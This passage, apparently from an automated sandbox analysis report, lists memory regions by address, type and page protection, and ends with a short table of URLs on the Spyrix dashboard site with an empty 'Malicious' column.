page read and write
|
||
578E000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
198F000
|
stack
|
page read and write
|
||
71D000
|
heap
|
page read and write
|
||
704000
|
heap
|
page read and write
|
||
51BE000
|
stack
|
page read and write
|
||
3228000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
2AA0000
|
heap
|
page read and write
|
||
12D6000
|
heap
|
page read and write
|
||
3800000
|
direct allocation
|
page execute and read and write
|
||
31E8000
|
heap
|
page read and write
|
||
4F1F000
|
heap
|
page read and write
|
||
892EE7B000
|
stack
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
10F8000
|
heap
|
page read and write
|
||
88E000
|
unkown
|
page read and write
|
||
4F79000
|
heap
|
page read and write
|
||
7FE40000
|
direct allocation
|
page read and write
|
||
2FF7000
|
trusted library allocation
|
page read and write
|
||
3CE0000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
17AC000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
4F7C000
|
heap
|
page read and write
|
||
FFC000
|
stack
|
page read and write
|
||
310E000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
5E6767B000
|
stack
|
page read and write
|
||
20CC000
|
direct allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
274055A0000
|
trusted library allocation
|
page read and write
|
||
38B0000
|
direct allocation
|
page execute and read and write
|
||
E36000
|
heap
|
page read and write
|
||
892E0AB000
|
stack
|
page read and write
|
||
7FD50000
|
direct allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
24F3000
|
heap
|
page read and write
|
||
27405460000
|
trusted library allocation
|
page read and write
|
||
70E000
|
stack
|
page read and write
|
||
304E000
|
stack
|
page read and write
|
||
76C4000
|
direct allocation
|
page read and write
|
||
650000
|
heap
|
page read and write
|
||
74E0000
|
trusted library allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
2AEB000
|
heap
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
238D47F0000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
890000
|
unkown
|
page execute and write copy
|
||
274000A2000
|
heap
|
page read and write
|
||
3830000
|
direct allocation
|
page execute and read and write
|
||
37C0000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
238D4929000
|
heap
|
page read and write
|
||
DD8000
|
heap
|
page read and write
|
||
3000000
|
heap
|
page read and write
|
||
293D000
|
stack
|
page read and write
|
||
361000
|
unkown
|
page execute read
|
||
3620000
|
direct allocation
|
page execute and read and write
|
||
17EB000
|
heap
|
page read and write
|
||
2740007D000
|
heap
|
page read and write
|
||
38F0000
|
heap
|
page read and write
|
||
3270000
|
heap
|
page read and write
|
||
520F000
|
stack
|
page read and write
|
||
22729B80000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
691F000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
3E60000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
73D000
|
stack
|
page read and write
|
||
17E7000
|
heap
|
page read and write
|
||
94F000
|
heap
|
page read and write
|
||
239E000
|
stack
|
page read and write
|
||
67A2000
|
heap
|
page read and write
|
||
4280000
|
direct allocation
|
page execute and read and write
|
||
2D43000
|
heap
|
page read and write
|
||
981F000
|
stack
|
page read and write
|
||
3780000
|
heap
|
page read and write
|
||
3990000
|
direct allocation
|
page execute and read and write
|
||
4390000
|
direct allocation
|
page execute and read and write
|
||
3EC0000
|
direct allocation
|
page execute and read and write
|
||
2740002B000
|
heap
|
page read and write
|
||
34A3000
|
direct allocation
|
page read and write
|
||
C80000
|
heap
|
page read and write
|
||
20E1000
|
direct allocation
|
page read and write
|
||
4EB0000
|
trusted library allocation
|
page read and write
|
||
753000
|
heap
|
page read and write
|
||
2C9E000
|
stack
|
page read and write
|
||
7C5000
|
heap
|
page read and write
|
||
14C0000
|
heap
|
page read and write
|
||
3F90000
|
direct allocation
|
page execute and read and write
|
||
4EAF000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
27400913000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
E16000
|
heap
|
page read and write
|
||
2FA1000
|
trusted library allocation
|
page read and write
|
||
5F2000
|
unkown
|
page readonly
|
||
2CF1000
|
heap
|
page read and write
|
||
22DC000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
4D80000
|
unclassified section
|
page read and write
|
||
20D3000
|
direct allocation
|
page read and write
|
||
4DEE000
|
stack
|
page read and write
|
||
3B50000
|
direct allocation
|
page execute and read and write
|
||
4FE7000
|
heap
|
page read and write
|
||
2C90000
|
heap
|
page read and write
|
||
952000
|
heap
|
page read and write
|
||
7FD6D000
|
direct allocation
|
page read and write
|
||
458B000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
29CB000
|
heap
|
page read and write
|
||
759000
|
heap
|
page read and write
|
||
2AF2000
|
heap
|
page read and write
|
||
34A2000
|
direct allocation
|
page read and write
|
||
2EF1000
|
trusted library allocation
|
page read and write
|
||
4020000
|
direct allocation
|
page execute and read and write
|
||
2F5C000
|
stack
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
4580000
|
direct allocation
|
page read and write
|
||
179F000
|
stack
|
page read and write
|
||
2ACE000
|
stack
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
2AE8000
|
heap
|
page read and write
|
||
6BB000
|
unkown
|
page readonly
|
||
37A7000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
3310000
|
direct allocation
|
page execute and read and write
|
||
726000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
238D4BE0000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
69E000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
2AEB000
|
heap
|
page read and write
|
||
17D4000
|
heap
|
page read and write
|
||
1F0401D0000
|
heap
|
page read and write
|
||
3690000
|
direct allocation
|
page execute and read and write
|
||
40F0000
|
direct allocation
|
page execute and read and write
|
||
17E1000
|
heap
|
page read and write
|
||
2410000
|
direct allocation
|
page execute and read and write
|
||
15D000
|
stack
|
page read and write
|
||
93000
|
stack
|
page read and write
|
||
6621000
|
direct allocation
|
page read and write
|
||
22729B90000
|
heap
|
page read and write
|
||
3940000
|
direct allocation
|
page execute and read and write
|
||
19B000
|
stack
|
page read and write
|
||
1CE89191000
|
heap
|
page read and write
|
||
A60000
|
heap
|
page read and write
|
||
37FF000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
39A0000
|
direct allocation
|
page execute and read and write
|
||
763000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
27400129000
|
heap
|
page read and write
|
||
E01000
|
heap
|
page read and write
|
||
89302FE000
|
stack
|
page read and write
|
||
22A0000
|
heap
|
page read and write
|
||
274054B0000
|
trusted library allocation
|
page read and write
|
||
2CD0000
|
heap
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
26C0000
|
direct allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
42F0000
|
direct allocation
|
page execute and read and write
|
||
29C5000
|
heap
|
page read and write
|
||
31E1000
|
heap
|
page read and write
|
||
17E5000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8200000
|
trusted library allocation
|
page read and write
|
||
2D78000
|
heap
|
page read and write
|
||
238D4BE5000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
3490000
|
heap
|
page read and write
|
||
27405470000
|
trusted library allocation
|
page read and write
|
||
4EE0000
|
trusted library allocation
|
page read and write
|
||
3840000
|
direct allocation
|
page execute and read and write
|
||
2ADA000
|
heap
|
page read and write
|
||
38FE000
|
heap
|
page read and write
|
||
236D000
|
direct allocation
|
page read and write
|
||
4250000
|
direct allocation
|
page execute and read and write
|
||
5A9000
|
unkown
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
15C0000
|
heap
|
page read and write
|
||
2AC0000
|
heap
|
page read and write
|
||
4DB0000
|
heap
|
page read and write
|
||
98F000
|
heap
|
page read and write
|
||
2AE1000
|
heap
|
page read and write
|
||
3870000
|
direct allocation
|
page execute and read and write
|
||
7D0000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
6B6000
|
unkown
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
4220000
|
direct allocation
|
page execute and read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
76F12FE000
|
stack
|
page read and write
|
||
8E8000
|
unkown
|
page execute and read and write
|
||
5EE000
|
unkown
|
page write copy
|
||
6F2000
|
heap
|
page read and write
|
||
3F60000
|
direct allocation
|
page execute and read and write
|
||
7F4000
|
heap
|
page read and write
|
||
F732FF000
|
stack
|
page read and write
|
||
9D10000
|
trusted library allocation
|
page read and write
|
||
67DF000
|
stack
|
page read and write
|
||
2950000
|
remote allocation
|
page read and write
|
||
4F79000
|
heap
|
page read and write
|
||
8200000
|
trusted library allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
2D0B000
|
heap
|
page read and write
|
||
215E000
|
stack
|
page read and write
|
||
11DB000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
34B7000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
273FFFC0000
|
trusted library allocation
|
page read and write
|
||
6BB000
|
unkown
|
page readonly
|
||
34DF000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
3080000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
4440000
|
direct allocation
|
page execute and read and write
|
||
3E10000
|
direct allocation
|
page execute and read and write
|
||
2D00000
|
heap
|
page read and write
|
||
114B000
|
trusted library allocation
|
page execute and read and write
|
||
3920000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
37A9000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
39C0000
|
direct allocation
|
page execute and read and write
|
||
39B0000
|
direct allocation
|
page execute and read and write
|
||
2FD000
|
stack
|
page read and write
|
||
892F679000
|
stack
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
205E000
|
direct allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
892F77E000
|
unkown
|
page readonly
|
||
34D5000
|
direct allocation
|
page read and write
|
||
377F000
|
stack
|
page read and write
|
||
22729B9A000
|
heap
|
page read and write
|
||
22729B84000
|
heap
|
page read and write
|
||
3437000
|
direct allocation
|
page read and write
|
||
7EA000
|
heap
|
page read and write
|
||
75B000
|
heap
|
page read and write
|
||
C86000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
9DA000
|
unkown
|
page execute and read and write
|
||
7EC000
|
heap
|
page read and write
|
||
360000
|
unkown
|
page readonly
|
||
1F0401D4000
|
heap
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
55BF000
|
stack
|
page read and write
|
||
61E99000
|
unkown
|
page readonly
|
||
22BF000
|
direct allocation
|
page read and write
|
||
5360000
|
trusted library allocation
|
page read and write
|
||
2D11000
|
heap
|
page read and write
|
||
6BA000
|
unkown
|
page write copy
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
43E000
|
unkown
|
page readonly
|
||
960000
|
heap
|
page read and write
|
||
3C30000
|
direct allocation
|
page execute and read and write
|
||
3BC0000
|
direct allocation
|
page execute and read and write
|
||
7B0000
|
heap
|
page read and write
|
||
5EE000
|
unkown
|
page write copy
|
||
327E000
|
heap
|
page read and write
|
||
4541000
|
direct allocation
|
page read and write
|
||
892EFFE000
|
stack
|
page read and write
|
||
36D0000
|
direct allocation
|
page execute and read and write
|
||
401000
|
unkown
|
page execute and read and write
|
||
F50000
|
heap
|
page read and write
|
||
3480000
|
heap
|
page read and write
|
||
4EB0000
|
trusted library allocation
|
page read and write
|
||
17EC000
|
heap
|
page read and write
|
||
38F7000
|
heap
|
page read and write
|
||
4120000
|
direct allocation
|
page execute and read and write
|
||
5EE000
|
unkown
|
page write copy
|
||
31E1000
|
heap
|
page read and write
|
||
1CE891BB000
|
heap
|
page read and write
|
||
22B8000
|
direct allocation
|
page read and write
|
||
23E8000
|
direct allocation
|
page read and write
|
||
6B0000
|
heap
|
page read and write
|
||
64C000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
7270000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
5B6000
|
unkown
|
page readonly
|
||
565B000
|
stack
|
page read and write
|
||
3D60000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
18D5000
|
heap
|
page read and write
|
||
274013B1000
|
trusted library allocation
|
page read and write
|
||
4EB0000
|
trusted library allocation
|
page read and write
|
||
4DB1000
|
heap
|
page read and write
|
||
7C23000
|
heap
|
page read and write
|
||
4F83000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
E54000
|
heap
|
page read and write
|
||
6640000
|
direct allocation
|
page execute and read and write
|
||
2FF1000
|
trusted library allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
905F000
|
stack
|
page read and write
|
||
7783000
|
heap
|
page read and write
|
||
2300000
|
direct allocation
|
page read and write
|
||
110F000
|
stack
|
page read and write
|
||
43E000
|
stack
|
page read and write
|
||
37F0000
|
direct allocation
|
page execute and read and write
|
||
274055C0000
|
trusted library allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
4400000
|
direct allocation
|
page execute and read and write
|
||
76C000
|
heap
|
page read and write
|
||
76A000
|
heap
|
page read and write
|
||
2FE8000
|
trusted library allocation
|
page read and write
|
||
17E1000
|
heap
|
page read and write
|
||
E38000
|
heap
|
page read and write
|
||
5803000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
419000
|
unkown
|
page write copy
|
||
31C4000
|
heap
|
page read and write
|
||
31D0000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
4010000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7E7000
|
heap
|
page read and write
|
||
3190000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
274054E1000
|
trusted library allocation
|
page read and write
|
||
3476000
|
direct allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
2B09000
|
heap
|
page read and write
|
||
165E000
|
stack
|
page read and write
|
||
7D20000
|
trusted library allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
3488000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
17B3000
|
heap
|
page read and write
|
||
7FE20000
|
direct allocation
|
page read and write
|
||
59B0000
|
trusted library allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
61E89000
|
unkown
|
page read and write
|
||
1CE891EE000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
7720000
|
heap
|
page read and write
|
||
534000
|
unkown
|
page readonly
|
||
5990000
|
heap
|
page read and write
|
||
1CE891AD000
|
heap
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
775000
|
heap
|
page read and write
|
||
DB6000
|
heap
|
page read and write
|
||
D9E000
|
stack
|
page read and write
|
||
6670000
|
heap
|
page read and write
|
||
7FDE0000
|
direct allocation
|
page read and write
|
||
34BD000
|
heap
|
page read and write
|
||
881000
|
unkown
|
page execute and read and write
|
||
17DA000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
7AE000
|
heap
|
page read and write
|
||
24DF000
|
stack
|
page read and write
|
||
28FD000
|
stack
|
page read and write
|
||
1666000
|
unkown
|
page execute and write copy
|
||
31C4000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
7FC10000
|
direct allocation
|
page read and write
|
||
5EA000
|
unkown
|
page readonly
|
||
3333000
|
direct allocation
|
page read and write
|
||
4460000
|
direct allocation
|
page execute and read and write
|
||
39F0000
|
direct allocation
|
page execute and read and write
|
||
3FA0000
|
direct allocation
|
page execute and read and write
|
||
27400113000
|
heap
|
page read and write
|
||
51CE000
|
stack
|
page read and write
|
||
95000
|
stack
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
37E0000
|
direct allocation
|
page execute and read and write
|
||
1D0000
|
heap
|
page read and write
|
||
7FE00000
|
direct allocation
|
page read and write
|
||
7FE17000
|
direct allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
7B6000
|
heap
|
page read and write
|
||
27400815000
|
heap
|
page read and write
|
||
176E000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
39E0000
|
direct allocation
|
page execute and read and write
|
||
7F4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
59A0000
|
heap
|
page read and write
|
||
17EB000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
444E000
|
stack
|
page read and write
|
||
7A5F000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
224F000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2950000
|
remote allocation
|
page read and write
|
||
3486000
|
direct allocation
|
page read and write
|
||
34AE000
|
stack
|
page read and write
|
||
745000
|
heap
|
page read and write
|
||
6FD000
|
heap
|
page read and write
|
||
4EC2000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
664000
|
heap
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
E1A000
|
heap
|
page read and write
|
||
4548000
|
direct allocation
|
page read and write
|
||
238B000
|
direct allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
52FE000
|
stack
|
page read and write
|
||
31E1000
|
heap
|
page read and write
|
||
22729B40000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
6B6000
|
unkown
|
page read and write
|
||
18DD000
|
heap
|
page read and write
|
||
2ADA000
|
heap
|
page read and write
|
||
4490000
|
direct allocation
|
page execute and read and write
|
||
2D49000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7FDDB000
|
direct allocation
|
page read and write
|
||
686000
|
heap
|
page read and write
|
||
31CE000
|
heap
|
page read and write
|
||
7EC000
|
heap
|
page read and write
|
||
274055F0000
|
remote allocation
|
page read and write
|
||
4070000
|
direct allocation
|
page execute and read and write
|
||
788000
|
heap
|
page read and write
|
||
17E8000
|
heap
|
page read and write
|
||
22B1000
|
direct allocation
|
page read and write
|
||
330E000
|
stack
|
page read and write
|
||
3560000
|
direct allocation
|
page execute and read and write
|
||
64E000
|
stack
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
17EB000
|
heap
|
page read and write
|
||
777000
|
heap
|
page read and write
|
||
273FFFD0000
|
trusted library section
|
page read and write
|
||
1CE892D4000
|
heap
|
page read and write
|
||
1460000
|
heap
|
page read and write
|
||
34B1000
|
direct allocation
|
page read and write
|
||
2920000
|
heap
|
page read and write
|
||
4EC4000
|
trusted library allocation
|
page read and write
|
||
E2F000
|
heap
|
page read and write
|
||
915F000
|
stack
|
page read and write
|
||
2AE5000
|
heap
|
page read and write
|
||
20BD000
|
direct allocation
|
page read and write
|
||
33F0000
|
direct allocation
|
page execute and read and write
|
||
17EA000
|
heap
|
page read and write
|
||
4E60000
|
heap
|
page read and write
|
||
7FD90000
|
direct allocation
|
page read and write
|
||
16E0000
|
heap
|
page read and write
|
||
53B0000
|
trusted library allocation
|
page read and write
|
There are 2408 hidden memdumps, click here to show them.
DOM / HTML
URL
|
Malicious
|
|
---|---|---|
https://dashboard.spyrix.com/
|
||
https://dashboard.spyrix.com/
|
||
https://dashboard.spyrix.com/login
|